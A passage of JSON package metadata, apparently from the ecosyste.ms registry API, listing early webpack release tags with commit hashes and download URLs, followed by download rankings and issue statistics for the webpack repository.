%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-28T13:09:13.675Z","dependent_packages_count":0,"downloads":10,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":54.12805865929274,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.09219907578260976,"forks_count":0.5385976421612024,"average":22.59082324410735},"purl":"pkg:npm/webpack-4-modern-acorn","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-4-modern-acorn","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-4-modern-acorn","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-4-modern-acorn/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T00:11:08.805Z","issues_count":10164,"pull_requests_count":9440,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2773483.7856259136,"issues_closed_count":9898,"pull_requests_closed_count":8891,"pull_request_authors_count":1445,"issue_authors_count":6685,"avg_comments_per_issue":5.83530106257379,"avg_comments_per_pull_request":3.1801906779661016,"merged_pull_requests_count":6026,"bot_issues_count":8,"bot_pull_requests_count":2913,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363637.6099865047,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":741,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4375,"past_year_avg_comments_per_pull_request":4.864893617021276,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1081,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/